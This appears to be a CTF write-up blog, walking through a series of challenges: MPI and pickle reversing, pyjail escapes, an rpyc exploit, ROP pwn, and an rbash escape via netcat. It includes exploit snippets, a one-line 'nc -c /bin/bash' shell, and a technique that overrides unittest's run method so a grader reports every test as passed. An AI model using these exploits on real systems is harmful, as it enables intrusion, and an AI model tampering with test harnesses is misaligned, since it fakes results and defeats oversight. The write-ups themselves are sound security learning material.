everyones just burnt out from organizing sapling lmao so im just looking at easy challs myself too
* * *
ngl this one is just reading MPI docs lmao
i didnt have mpirun set up, so i just ended up statically reversing the entire thing
which wasnt that bad actually theres only really 3 functions in question:
- first one reads the flag as the root process, scrambles it, and then scatters it to the rest of the processes via `MPI_Scatter`
- on first glance i thought the second one was just an artificial delay of some sorts since all it does is basically just sending and recving then syncing up, but on closer look they are swapping values between processes
- third one gathers back the flag and checks it against the string as root process, and does nothing as other processes
so its just a matter of rewriting the program in python without all the interprocess communication overheads then
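the whole pipeline minus MPI can be mocked in a few lines of plain python - toy 8-byte "flag" and a made-up swap here, not the chall's real pattern:

```python
# pure-python stand-in for the three stages: root scatters equal chunks,
# ranks swap via matched send/recv pairs, root gathers them back
def scatter(data, nranks):
    n = len(data) // nranks
    return [data[i * n:(i + 1) * n] for i in range(nranks)]

def gather(chunks):
    return "".join(chunks)

chunks = scatter("abcdefgh", 4)               # ['ab', 'cd', 'ef', 'gh']
chunks[0], chunks[1] = chunks[1], chunks[0]   # one send/recv pair == one swap
print(gather(chunks))  # cdabefgh
```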
except i kept brainfarting and somehow thought `#!py print("".join(['m_ERpmfrNkekU4_4asI_Tra1e_4l_c4_GCDlryidS3{Ptsu9i}13Es4V73M4_ans'[s[i]] for i in range(64)]))` would give me the correctly inversed flag if `s` is the scrambled index lmao
then i went on a rabbit hole figuring out where exactly i did the swapping wrong scrutinizing every single detail in the MPI docs and trying out like 4 different variations of my swapping from doing it in parallel to making a multidimensional array to ensure im not making arithmetic mistakes on the array indices
and then i finally gave up and used z3 which instantly spewed out the flag :clown:
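in hindsight the brainfart is obvious: applying the permutation forward a second time is not the inverse - toy example with a made-up `s`:

```python
# toy scramble with a made-up permutation s (not the chall's)
s = [2, 0, 3, 1]
plain = "abcd"
scrambled = "".join(plain[s[i]] for i in range(4))   # "cadb"

# the brainfart: applying s forward again is NOT the inverse
wrong = "".join(scrambled[s[i]] for i in range(4))   # "dcba"

# the actual inverse: put scrambled[i] back at position s[i]
res = [None] * 4
for i in range(4):
    res[s[i]] = scrambled[i]
print("".join(res))  # abcd
```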
eyo something familiar to me lets go?? ~~totally not something ive been doing to my own courses' autograders~~
except this one highkey is easier than the hurdles prairielearn and the likes bring me through tho lmao
we get arbitrary leaks just by returning the value (albeit truncated), and theres no restrictions on whatever imports we need
so logically the first thing to do is to traverse the stack since apparently all of these autograders basically run in the same process for some reason lol
~~like interprocess communication and isolation between graders and runners wouldve been a much better design choice to prevent grade modifications but ok~~
anyways it seems like most of the useful variables are in the second previous frame, so after a lot of `str(inspect.currentframe().f_back.f_back.f_globals.keys())[:64]`, `[64:128]`, `[128:192]` etc etc to leak the data out by chunks to bypass the truncation i mentioned before i finally...
got fed up with the inefficiency :upside_down:
which funnily enough is also when i saw `_common_shorten_repr` which sounds suspiciously like its responsible for the truncation
and so nooping it i go: `#!py inspect.currentframe().f_back.f_back.f_globals['_common_shorten_repr'] = lambda *str: str`
originally i guessed `#!py lambda str: str`, but that ended up spewing arcane errors about the format string having not enough parameters lmao so i just made it vararg instead
and ey i was correct now we can leak things much faster than having to stitch together chunks after multiple runs
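for posterity, the chunk-stitching from before amounts to this (with `leak()` standing in for one grader run):

```python
# reassemble a long repr from fixed-size windows, one "run" per window
SECRET = str({"grade": 100, "flag": "test{not_real}", "pad": "x" * 150})

def leak(lo, hi):
    return SECRET[lo:hi]  # each run can only return 64 chars of str(...)

out, i = "", 0
while True:
    chunk = leak(i, i + 64)
    out += chunk
    i += 64
    if len(chunk) < 64:  # short (or empty) chunk means we hit the end
        break
print(out == SECRET)  # True
```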
the next thing that caught my eyes is `TestCase` - this is just from the builtin `unittest` module aint it
for it to be here it probably means they are using it to run the tests, so what if we just make all the assertions on it succeed
and with the following code
```py
# TestCase is just python unittests, we can set assert* to True to pass all assertions
# (reconstructed sketch - the real payload grabbed TestCase out of the leaked frame globals)
tc = inspect.currentframe().f_back.f_back.f_globals['TestCase']
for attr in dir(tc):
    if attr.startswith('assert'):
        setattr(tc, attr, lambda *a, **kw: True)
```
except a lot of the other test cases are still complaining about wrong format lmao so just nooping the assertions arent enough we need to noop the entire test case
after reading on how `TestCase` works for a bit i realized all test cases have to go through the `run` entrypoint
so what if we just noop that instead
turns out its slightly more complicated than just a `lambda res: None` lmao we need to get the actual test cases which subclass `util.TestCase`, and also set the `TestResult` object to success
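the run-override idea in miniature, against a toy `TestCase` (not the grader's actual classes):

```python
# every unittest test goes through TestCase.run(result), so overriding run
# to just record a success skips the test body entirely
import unittest

class Graded(unittest.TestCase):
    def test_fail(self):
        self.assertEqual(1, 2)  # would normally fail

def fake_run(self, result=None):
    # mark this test as passed without executing it
    result.startTest(self)
    result.addSuccess(self)
    result.stopTest(self)

Graded.run = fake_run
result = unittest.TestResult()
unittest.TestLoader().loadTestsFromTestCase(Graded).run(result)
print(result.wasSuccessful(), result.testsRun)  # True 1
```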
even tried to nudge rpyc to send the code to remote with no avail lol
```py
class metatest(type):
    def __add__(self, b):
        import subprocess
        breakpoint() #if its local i will see instantly on my current terminal - just for ease of local debugging since cwd is same for server and client and its hard to tell
```
coz i thought what if they only accounted for normal usage of functions so cases like these would be tricked into calling the local versions of the objects instead of netrefs but no its not how it works
so since it seems like normal use cases wont be able to trigger code execution on remote its time to dig deep into the src
it turns out theres a netref class in `netref.py` that basically proxies all remote objects' functions back to remote through a few handlers in `protocol.py`
which means all local references execute on local since on remote they just become a netref so they just bounce back to run the code on local (and vice versa too - all remote references will stay in remote land, but we cant really access remote references since getattr is locked down)
since it seems like there aint much we can do with the netrefs themselves, i started digging deep into the protocol handlers, which all seemed pretty secure in the `DEFAULT_CONFIG` sense - until i found `HANDLE_CMP` which just called `#!py return getattr(type(obj), op)(obj, other)` for some reason
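stripped of all the rpyc machinery, that one line is the whole vuln - a local sketch of the same shape:

```python
# same shape as the HANDLE_CMP handler, minus the networking: `op` is
# attacker-controlled, so op='__getattribute__' turns the "comparison"
# into a generic attribute read
class Obj:
    secret = "hi"

def handle_cmp(obj, other, op):
    return getattr(type(obj), op)(obj, other)

o = Obj()
print(handle_cmp(o, "secret", "__getattribute__"))  # hi
```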
so i started thinking if theres any attr we can leak that will help us leak more which *also* has the property of accepting 2 parameters - and it turns out `__getattr__` does exactly that
except `__getattr__` actually just bounces everything back into local:
```py
def __getattr__(self, name):
    if name in DELETED_ATTRS:
        raise AttributeError()
    return syncreq(self, consts.HANDLE_GETATTR, name)
```
BUT `__getattribute__` DOES get the local attributes specified in `LOCAL_ATTRS`, which includes most useful things like `__class__` and `__dict__`
now we can finally leak remote references that are not netrefs out into our client, which once we have them should allow us to stay in remote land
we still need to continue using this vulnerable `getattr` method instead of directly `obj.attr`ing which will use the secure `HANDLE_GETATTR` handler though, but the idea stays the same as most basic pyjails
with that, we can get arbitrary code execution on remote, and the flag: `dice{pyj41l_w1th_4_tw15t}`
```py
import rpyc
from rpyc.core import consts
#the idea is that once you get a remote reference, you can stay in remote land since all calls will be directed back to remote
#however getting that remote reference in the first place is quite annoying since most useful attributes are either blocked or local
#and theres not really a way to differentiate between those unless you dive into rpyc src
#also any local references (e.g. import os; os.system is a local reference that will end up running on our local machine; a local definition of a class with modified __add__ to trick remote to run will also not work since it will bounce back to local when we do conn.root.add())
#will end up bouncing back to local so the entrypoint has to be conn.root since that's the only remote reference at start
def remote_getattr(obj, name):
    #abuses the fact that CMP is the only one that doesnt have a secure check but directly uses getattr
    #also abuses the fact that __getattribute__ bypasses netref calls for certain local attrs so we dont bounce back to client
    #(reconstructed body - HANDLE_CMP runs getattr(type(obj), op)(obj, other) on remote, and `conn` is the rpyc connection from earlier)
    return conn.sync_request(consts.HANDLE_CMP, obj, name, '__getattribute__')
```
also unrelated: wsl port forward messed with my local/remote debug setup apparently lmao
and it seems like rpyc requires same (major?) version to run correctly? i was on 5.1.0 which just kept giving me connection closed by peer
this bug apparently is patched in the version i had in my python installation so im just glad i got stuck connecting to remote and downgraded to 4.1.0 before digging into the src lmao
or else i'd probably be malding over how theres no entrypoints for me to exploit at all kekw
ngl this was kinda fun i get to use my niche pickling knowledge from kevin higgs revenge in gdg lmao

~~though it ended up being me just dumping the code and not actually reversing the pickle anyway~~

since we are given a blob thats very clearly a pickle coz of the `#!py __import__('pickle').loads`, ofc the first thing to do is to `#!py import pickletools; pickletools.dis` it

and holy thats a huge pickle

we can clearly see that the top part is a character mapping though which is utilized through `MEMOIZE` and `GET` and `#!py builtins.str.join`

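the `BINUNICODE` + `MEMOIZE` shape is easy to reproduce on a toy pickle if you want to see what the parser is keying on:

```python
import io
import pickle
import pickletools

# a list of one-char strings disassembles into (SHORT_)BINUNICODE + MEMOIZE
# pairs - the same shape the character table has in the real pickle
out = io.StringIO()
pickletools.dis(pickle.dumps(["f", "l", "a", "g"]), out=out)
lines = out.getvalue().splitlines()
print(any("BINUNICODE" in l for l in lines), any("MEMOIZE" in l for l in lines))  # True True
```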
so with a bit of ~~scuffed~~ parsing we can extract the mapping:
```py
import pickletools, io, re

data = io.StringIO()
#blob omitted since its way too big to paste here
pickletools.dis(blob, out=data)
data = data.getvalue().split('\n')

alph = ""
for i, line in enumerate(data):
    if 'MEMOIZE' in line and 'BINUNICODE' in data[i-1]:
        alph += eval(data[i-1].split('BINUNICODE ')[1])

print(alph.encode())
```

and with the mapping we can extract a lot of data on what is being called and whatnot ~~through another scuffed af parser~~:
```py
    #(excerpt - from the same loop over the dis output as the mapping extractor)
    elif 'REDUCE' in line and 'LIST' not in data[i-2] and 'GET' not in data[i-3]:
        print('CALL ABOVE')
    elif 'STACK_GLOBAL' in line:
        print('GET OBJ')
    elif 'BINBYTES' in line:
        print('ARG BYTES')
    else:
        if currstr:
            print(currstr)
            currstr = ""
```
which tells roughly what strings should be treated as an object and whats being called on what

looking at the strings in a stack based mindset and referring back to the pickle its not too hard to realize what the `BINBYTES` blobs inside the pickle are - which yields us one bytecode blob and one pickle blob, both perfectly disassemblable

but looking at the disassemblies, we see another spam of things like:
```text
  369: \x94 MEMOIZE    (as 56)
  370: K    BININT1    17
  372: K    BININT1    3
  374: \x86 TUPLE2
  375: \x94 MEMOIZE    (as 57)
  376: K    BININT1    17
  378: K    BININT1    9
```
and some bytecode that i didnt really wanna read through which also cant be decompiled since i dont have the data for co_names and all that yet

if i really wanna make it decompilable, ill probably have to reverse the rest of the main pickle which seems to grab a reference of the code object class, instantiate it with a lot of weird stuff (namely just `snek`s everywhere), and set that to `#!py pickle.encode_long.__code__`

which i honestly wasnt too keen on making another parser for

but its also at this point where i saw the single `BUILD` call, and i figured since they are calling the function here anyway why dont i just hook the `BUILD` opcode handler and just dump the fully built code object

which is surprisingly straightforward if we copy the handler from src and call the unpickler directly:
```py
import pickle, importlib, marshal

def load_build(self):
    stack = self.stack
    state = stack.pop()
    with open('testsnek.pyc', 'wb') as w:
        code = state[1]['__code__'].replace(co_varnames=tuple([v+str(i) for i,v in enumerate(state[1]['__code__'].co_varnames)]))
        #(reconstructed - a pyc is just the magic number, 12 header bytes, then the marshalled code object)
        w.write(importlib.util.MAGIC_NUMBER + b'\0' * 12 + marshal.dumps(code))
    #(the rest mirrors the stock load_build handler in the pickle src)

#hook it in and run the blob through the pure-python unpickler so our handler actually fires
pickle._Unpickler.dispatch[pickle.BUILD[0]] = load_build
```
(the `#!py [v+str(i) for i,v in enumerate(state[1]['__code__'].co_varnames)]` is for replacing the variables names which are all `snek` that somehow works in code objects (coz presumably the variable name parsing stage is by the compiler i guess) but is just hard to read during decomp)

now that we got the pyc file, we can just run something like `pycdc testsnek.pyc` - after patching pycdc to handle the opcodes it chokes on:
```diff
+                for (const auto& it : lhs.cast<PycSet>()->values()) {
+                    result.push_back(new ASTObject(it));
+                }
+            }
+
+        } else {
+            //for tuples
+            for (const auto& it : lhs.cast<PycSet>()->values()) {
+                result.push_back(new ASTObject(it));
+            }
+        }
+
+        stack.push(new ASTList(result));
+    }
+    break;
 case Pyc::LIST_EXTEND_A:
     {
         PycRef<ASTNode> rhs = stack.top();
```
and yes in case you are wondering i basically just copied the code from other opcode handlers coz all i need is for it to pass and create a good looking enough decomp lmao

doesnt have to be accurate coz ill have to clean it up anyway
```py
#(excerpt of the raw pycdc output)
        if snek17[0] < 0 and snek17[0] >= snek3 and snek17[1] < 0 or snek17[1] >= snek3:
            print('snek dead :(')
            return None
        None.appendleft(snek17)
        if snek17 in snek5[snek8]:
            snek8 += 1
            snek10.append(snek17)
            if snek8 == len(snek5):
                snek18 = 0
                for snek19, snek20 in snek10:
                    snek18 ^= 1337
                    snek18 *= snek3 ** 2
                    snek18 += snek19 * snek3 + snek20
                if snek4 == snek18:
                    print('snek happy :D')
                    print(open('flag.txt', 'r').read().strip())
                    return None
                None('snek sad :(')
                return None
            snek6.pop()
        elif snek15 == 'L':
            snek7 = (-snek7[1], snek7[0])
        elif snek15 == 'R':
            snek7 = (snek7[1], -snek7[0])
        else:
            print('snek confused :(')
            return None
        None.sleep(0.1)
    else:
        snek9.extend(input('snek? ').strip().split())
    continue
```

though its clear that my code didnt deal with frozensets as well as i hoped LMAO

but then again we can see `snek5` has the same length as the frozensets list in `co_consts` so we can just sub it in

along with fixing some clearly broken code like `#!py None.sleep(0.1)` and some renaming we finally can get a runnable decomp and a pretty good understanding on what its doing - which is now about as easy to understand as it gets for a rev chall:

 - its a bog standard snake game

 - we move by specifying direction (`L` for counterclockwise, `R` for clockwise), and the amount of steps in that direction

 - can specify infinite steps in a single input if needed

 - we need to eat 10 fruits in total

 - we need to eat the fruits in the order determined by `final`

after brainfarting for actually way too long thinking i need to either z3 or bruteforce this to no avail, i realized its literally trivially decomposable since its just storing data in chunks of `20^2`

and i brainfarted *even more* by not realizing i was iterating in the wrong order so the positions i got were not matching up with the location of the fruits specified in `data`

which made me so confused to the point where i was doubting my math skills yet again :upside_down:

anyways with
```py
pos = []
for i in range(10):
    #in reversed order
    if i: #the last one should not be xored
        final ^= 1337
    val = final % (20 ** 2)
    y, x = (val // 20, val % 20)
    pos.append((x, y))
    if (y,x) not in data[9-i]:
        print(x, y, 'off') #should not happen

    final //= (20 ** 2)

for p in pos[::-1]:
    print(*p)
```

we can finally get the list of fruit coords we gotta eat in order to trigger the "special" ending that prints the flag
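as a sanity check on the `20^2` packing, the scheme round-trips cleanly on the first few recovered coords:

```python
# forward pass mimics the decompiled check, reverse pass mimics the solve script
coords = [(0, 11), (3, 0), (18, 8)]  # (x, y) samples from the recovered list

acc = 0
for x, y in coords:
    acc ^= 1337
    acc *= 20 ** 2
    acc += y * 20 + x

out, final = [], acc
for i in range(len(coords)):
    if i:  # the outermost (last-added) value was not xored again
        final ^= 1337
    val = final % (20 ** 2)
    out.append((val % 20, val // 20))
    final //= 20 ** 2

print(out[::-1])  # back to coords, in order
```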

```text
x y
0 11
3 0
18 8
18 14
11 17
12 3
10 19
7 16
15 16
5 16
```
and since at this point i dont trust myself in coding anything anymore i just solved it ~~painfully~~ by hand routing the path and playing

which yields us `9 L 1 R 2 R 1 R 8 R 3 L 3 R 8 R 7 L 1 R 3 L 6 L 2 R 1 R 6 R 1 7 L 3 1 L 2 L 6 R 2 L 9 L 3 2 L 16 R 3 R 3 R 4 L 1 R 4 R 1 1 R 8 R 1 L 3`

and running it on remote finally yields us the flag after a lot of board printing:
`lactf{h4h4_sn3k_g0_brrrrrrrr}`

### pycjail

ngl this one is just finding That One Trick:tm: in the cpython impl lmao

that being said i havent really looked into the opcode implementations for cpython so it ended up taking a bit of time and trial and error still

still feels easier than snek tho idk why this has so many fewer solves than that

* * *

since we are writing python instructions by hand i first tried a few normal things to get the hang of writing the bytecode

like the args for each opcode and all that

while trying that i got an idea tho and that is to invoke an exception, which in a lot of higher level languages provides quite a bit of debug detail which is usually crucial to leaking info or getting data to nudge with

like python tracebacks have frame info embedded in `tb_frame` which grants us access to globals and locals and all that

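outside the jail that chain is just this (with a stand-in global):

```python
import sys

SECRET = "flag{example}"  # stand-in for something interesting in f_globals

# traceback -> frame -> globals, the same data the exception hands the jailed code
try:
    raise RuntimeError("boom")
except RuntimeError:
    tb = sys.exc_info()[2]

print(tb.tb_frame.f_globals["SECRET"])  # flag{example}
```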
while trying to set up try except frames i realized `RAISE_VARARGS` performing reraise (`8200`) is probably the easiest way to trigger an exception with the least amount of code

and after looking a bit on how to set up try except frames in bytecode, plugging in `7a01 8200 5300` really did return us something pretty useful: `<class 'RuntimeError'>`

but thats probably not it, so to make it easy to check the stack i packed the last 3 vals on the interpreter stack into a tuple before returning with `7a01 8200 6603 5300`, and aha: `(<traceback object at 0x7f4b4f2c3340>, RuntimeError('No active exception to reraise'), <class 'RuntimeError'>)`

since our goal is to somehow load attributes, reading through the instructions that arent banned (all `LOAD`/`STORE`/`DELETE` are basically banned aside from `LOAD_CONST`), i locked onto the `MATCH_CLASS` opcode, which was recently added in 3.10, exactly the version the remote is running:

> TOS is a tuple of keyword attribute names, TOS1 is the class being matched against, and TOS2 is the match subject. count is the number of positional sub-patterns.
>
> Pop TOS. If TOS2 is an instance of TOS1 and has the positional and keyword attributes required by count and TOS, set TOS to True and TOS1 to a tuple of extracted attributes. Otherwise, set TOS to False.
>
> *New in version 3.10.*


which means it accepts a class and then an object to check for an attribute, and returns that on success (along with a `True`/`False` indicator)

wwwaaaaiiittt doesnt that fit exactly what we have on the stack after generating the exception? that means we can get arbitrary attributes from the exception class eyo

and indeed it does - with some nudging, we can get the following:
```text
consts: __setattr__
names:
code: 7a01 8200 6400 6601 9800 6603 5300
here goes!
(<traceback object at 0x7ff5c9d42c40>, (<method-wrapper '__setattr__' of RuntimeError object at 0x7ff5c9cdd080>,), True)
```

but now the problem comes - we can get anything from RuntimeError, and even set attributes on the object by duplicating them on the stack so we can refer to it after it gets consumed by `MATCH_CLASS`, but thats about as far as we can go since we cant really chain attribute gets:

 - its not possible to obtain the class object of the attribute itself without getting the `__class__` attribute first which is a circular dependency,

 - and we cant really obtain any useful objects to store into setattr outside of those reachable by calling the exception attributes or directly accessing them either anyways, which from all the exception classes i can invoke none provide any useful attributes i can use

 - all methods we obtain are from the object not the class, and therefore bound to it so we cant just obtain a generic getattr for any objects (e.g. invoke `RuntimeError`'s `__getattribute__` on the traceback object) - see how it says `<method-wrapper>` not `<slot wrapper>`, ~~which itself is bound to all `BaseException` objects only so we cant apply it to most things anyway~~

so after a lot of coping (why did it have to look so promising man :sob:) its time to go back to the drawing board

ive always thought the way that they hardcoded `IMPORT_NAME` and not all the `IMPORT_.*` opcodes to be kinda suspicious, so i looked into that right after

i first tried `IMPORT_STAR`, seeing if i could get it to load attributes from objects that arent modules, and it actually kinda worked, with the object popped and no errors - except it doesnt load it onto the stack, and we cant do `LOAD_FAST` coz thats banned (and we cant write values to `co_varnames` anyway)

so its time to check `IMPORT_FROM` - it seems like this one performs much more module related checks, but after quite a while of digging into the rabbit hole of functions that this opcode uses (and even having to debug cpython to figure out why it wasnt returning what i was expecting, since opcodes dont give good error messages 90% of the time), i realized:

 - `IMPORT_FROM` can actually import arbitrary modules as long as you fake a `__name__` in the object, which we can do by obtaining `__setattr__` through the `MATCH_CLASS` trick and then setting `__name__` to an arbitrary string we can load from `LOAD_CONST` (its the only data type we can enter into co_consts, which was surprisingly helpful)

 - however, it has to be already loaded before (aka in `sys.modules`), or else it fails (this is presumably due to the interpreter expecting `IMPORT_NAME` to be called before `IMPORT_FROM` like it normally does)

 - the module name also has to be in the form of `<pkgname>.<name>` - theres no way to remove that dot since it is hardcoded regardless of whether you have an empty string or not

and with the following (jail conformant, but for illustration purpose its in an interactive console instead) code we can verify that the above deductions are correct:
```text
<module 'importlib.util' from '/usr/lib/python3.10/importlib/util.py'>
```

unfortunately having a module object really doesnt do us much good since the good ol "no getattr and no LOAD_FAST" strikes again

and we can already import modules from plain ol objects arbitrarily so theres no point in getting a real module especially when we cant import actually useful ones like `sys`

but this got me very confused since im definitely sure `from x import y` can import non module things too so i must be missing something

and missing something i definitely did :facepalm::
```c
    if (_PyObject_LookupAttr(v, name, &x) != 0) {
        return x;
    }
```
this is literally the first thing in the handler which checks if the attribute exists in the object and instantly returns it if so *without checking anything module related*

which means its literally a `getattr` in disguise lmao i didnt have to find such a convoluted way to load a module when i can just chain attributes

~~which is honestly sad coz this payload is pretty cool ngl~~

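a rough python mimic of the whole handler (the real logic lives in cpython's `import_from()` in ceval.c; this is a simplified sketch):

```python
import sys
import importlib.util  # ensures "importlib.util" is already in sys.modules

def import_from(v, name):
    # fast path: plain attribute lookup, returned with no module checks at all
    try:
        return getattr(v, name)
    except AttributeError:
        pass
    # fallback: "<pkgname>.<name>" looked up in sys.modules - the dot is hardcoded
    fullname = f"{v.__name__}.{name}"
    if fullname not in sys.modules:
        raise ImportError(f"cannot import name {name!r}")
    return sys.modules[fullname]

class Fake:
    __name__ = "importlib"  # faked name, like the __setattr__ trick does in-jail

mod = import_from(Fake(), "util")
print(mod)  # the real importlib.util module
```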
from here on out its just a normal pyjail with some length restrictions which isnt a problem since we can easily RCE with `#!py traceback.tb_frame.f_builtins['exec']('breakpoint()')` (exec needed since breakpoint doesnt behave well on a broken stack like this apparently)

hey at least i learnt quite a bit on how i can trick cpython into doing things i want if i have access to direct bytecode

also it turns out setting `__code__` can break cpython in quite a lot of ways lmao with everything from `free(): invalid pointer` to `Segmentation fault` if you get a funny interpreter stack going

the easiest one is to just exhaust the stack so that TOS doesnt even exist anymore

i wonder if its possible to do some cpython pwning with that actually :thinking:

~~also kinda sus that the flag aint `lactf` prefixed~~

### a hacker's notes

a few of my teammates were working on getting the disk image decrypted and extracting data out of it while i was working on pycjail, but then i got fed up with it and took a break to look at other ppls progress

thats where i saw ppl talking about joplin and i was like eyo joplin?? fancy seeing a niche software i use and have tinkered with in a ctf

ppl saw weird flag like strings in the db through `strings` but couldnt find where they were at, so i just opened it in sqlite explorer and looked through until i saw it in `notes_fts_segdir`

im pretty sure thats unintended since its a part of the full text search mechanism (and its all in lower case compared to the actual flag we get later on anyway)

so i just looked for another route while my teammates were working on figuring out how the words match up to a flag

i remembered a class that handled all encryption stuff in joplin which was pretty nice to use back when i tinkered with the src so i tried looking for it

and yep `EncryptionService` is right there and we can instantiate separate instances to add master keys and all that to decrypt stuff, since we have both the encrypted string in the `encrypted_notes` dir and also the master key and master password in the `settings` table in the db

i was gonna run it on my actual joplin instance but i figured thats probably not the best idea lmao i dont wanna screw up my own notes sync

so i just spun up a portable instance and just threw the code into it

and ey flag ez `lactf{S3cUr3_yOUR_C4cH3D_3nCRYP71On_P422woRD2}`
+spotted the out of bounds access pretty early while messing around with unmatching text and placeholder lengths which allows us to directly buffer overflow since no canary
+
+but that only gives us ret overwrite at 0x48 and theres nothing in the binary that can give us ez RCE
+
+and theres also no obvious leaks that we can use in the code either since we cant make a c++ string that is shorter than what is printed
+
+so it means we probably have to ret for a leak and then go back to main again to do the actual RCE
+
so i tried looking for something that can do the equivalent of `printf` without all the c++ fluff and preferably just straight up jumpable without much setup for me but alas pwn never is this straightforward
+
+so crafting rop it is i guess
+
+after finding the cout that actually works with a c string and a disgusting chain that was actually pretty straightforward to write we finally get a leak and a return to main that didnt crash
+
+somehow the "enter some text" prompt gets skipped as an empty string tho but that doesnt matter coz i was using empty strings for text anyway
+
+anyway with `one_gadget` it was more straightforward to get a shell than to leak the libc lmao
+
+but yea after a brief scare due to connection issues theres the flag `lactf{1_l0v3_c++_L2zuBdqJABGU}`
```py
#(tail of the exploit script - the leak and rop chain setup above is omitted)
p.sendafter('Enter the index of the stuff to redact: ', b'0')

p.interactive()
```
+
+this chall made me realize when i give up on pwn challs its mostly coz i dont wanna do all the work setting up the env not that i dont know what to do lmao
+
+like this chall is honestly pretty straightforward yet im still annoyed by the fact that i gotta do non trivial setup
+
+i honestly should do more pwn to train up speed tbh pwn is really fun anyway
aside from the first word that the calc pushes onto the interactive console - which must be alphabetic
interactive console can retrieve values using `_` - sth i learnt while watching jason use it for radare and binja lol coz i never use interactive console
all thats left is to find a way to unwrap dicts into lists which the * list unpacking operator works excellently
which performs exactly the bit flipping said in the chall desc lol
well then all thats left is to map which bits to flip and thats it for the first part
second part is figuring out that the loop reads null terminator while the length check reads c++ string length integer instead so theres a mismatch if we send them null bytes before hitting a line feed which makes the second part solvable
(below is for second part but first part can be mapped in the same way)
```py
#get a comparison for checking the bits to flip
print([c + " " + bin(ord(c)) for c in '1000 USD'])
print([c + " " + bin(ord(c)) for c in '9999 BTC'])
p.sendline('EEEMEPEUEXFCFFFRFTFUFVGBGCGDGJGKGL\0\0') #for loop loops until null terminator, but c++ length checks whole string until \n which finishes getline
p.interactive()
```
(this is easily doable automatically but i was aiming for first blood so i manually did them all lol)
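for reference, the automated version of the mapping is just a per-char xor:

```python
# map which bits differ per character between what we have and what we want
have, want = '1000 USD', '9999 BTC'
flips = [ord(a) ^ ord(b) for a, b in zip(have, want)]
print([f'{a}->{b}: {f:08b}' for (a, b), f in zip(zip(have, want), flips)])
```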
### flag hoarder
open core, see program argument is `/home/knox/Downloads/a.out ./flag.txt.bz2 ./password.txt`
extract part of elf using `info proc mapping` -> `dump memory core.bin 0x555555554000 0x555555555FFF` (0x555555556000 is unreadable)
decompile whatevers decompilable, realize its opening files in argument and xoring something and pretty much not doing anything else
strings core file for `password`, see the very secret password, assume its the password we need and xor it according to guessing from decompilation
get bamboozled by the line feed and wonder why bz2 is dying until i opened the dump in hex editor and saw the 0A right after the password
add it and tada
solve script:
```py
import bz2
pw = b'this is my very secret password mwahahaha\n'
#(reconstructed ending - repeating-key xor guessed from the decompilation)
enc = open('flag.txt.bz2', 'rb').read()
dec = bytes(c ^ pw[i % len(pw)] for i, c in enumerate(enc))
print(bz2.decompress(dec).decode())
```
pwnlib safeeval checks opcode, which means i gotta learn pyc bytecodes
was testing what makefunction and loadfunction does, since thats the only thing they added for this chall to an otherwise proven fortified implementation
then i realized lambda can smuggle data
```py
import dis
c = compile("lambda x: ().__class__.__subclasses__()", '<string>', 'eval')
dis.dis(c) #the payload only shows up as a code object const here, so the opcode check never sees it
#thus we can break safeeval jail using this since lambda smuggles code
```
originally assigned lambda then called it, but that triggers `LOAD_NAME` which aint allowed
but we can call it directly after defining
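quick sanity check that the inline call really never touches the banned opcode:

```python
import dis

# the inline-call pattern compiles to LOAD_CONST + MAKE_FUNCTION + a call,
# with no LOAD_NAME/STORE_NAME in sight (only the top-level code is scanned)
code = compile("(lambda: 1)()", "<jail>", "eval")
ops = {ins.opname for ins in dis.get_instructions(code)}
print(sorted(ops))
```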
whew flag
### rbash warmup
since rbash only restricts command use, doesnt restrict arguments, use netcat to exec bash
local nc needed since host cannot communicate with outside services at all
so make 2 ncs and background both then foreground the listener to interact with bash
```sh
nc -v -l -n 127.0.0.1 -p 1337 &
nc 127.0.0.1 1337 -c /bin/bash &
fg 1
```
### internprise encryption
i translated it to z3 script without realizing its unicode based and unicode is variable length lol so `rb` wouldnt work
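quick illustration of why byte offsets and char offsets diverge:

```python
# utf-8 is variable length: 3 characters here take 6 bytes, so indexing the
# raw 'rb' bytes doesn't line up with the per-character encryption
s = "aé€"
print(len(s), len(s.encode("utf-8")))  # 3 6
```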
once [@Arctic](https://maplebacon.org/authors/rctcwyvrn/) pointed that out to [@kever](https://maplebacon.org/authors/vEvergarden/) i solved it with z3 after dealing with extra signed bits
hey first z3 solve i guess
```py
from z3 import *
s = []
sol = Solver()
with open('flag.txt', 'r', encoding='utf-8') as enc:
    ef = enc.read()
for i in range(len(ef)):
    s += [BitVec('c' + str(i), 8)]
    x = SRem((s[i] + i * 0xf), 0x80)
    #print(simplify(x))
    x += SRem(BitVecVal(ord(ef[i - 0x1]), 8), 128) if i > 0x0 else 0xd
    #print(simplify(x))
    x = SignExt(4, x) ^ 0x555
    #print(simplify(x))
    x = ((x ^ ~0x0)) & 0xff
    #print(simplify(x))
    x = ~(Extract(8, 0, x ^ 0x3))
    #print(simplify(BV2Int(x, is_signed=True)))
    x = ((x >> 0x1f) + x) ^ (x >> 0x1f)
    #print(simplify(BV2Int(x, is_signed=True)))
    #ef += [Extract(9, 0, x)]
    sol.add(x == ord(ef[i]))
print(sol.check())
print(sol.unsat_core())
model = sol.model()
#print([simplify(BV2Int(x, is_signed=True)) for x in ef])
print('wtf' + str(model))
print("".join([chr(model[var].as_long() & 0b01111111) for var in s]))
```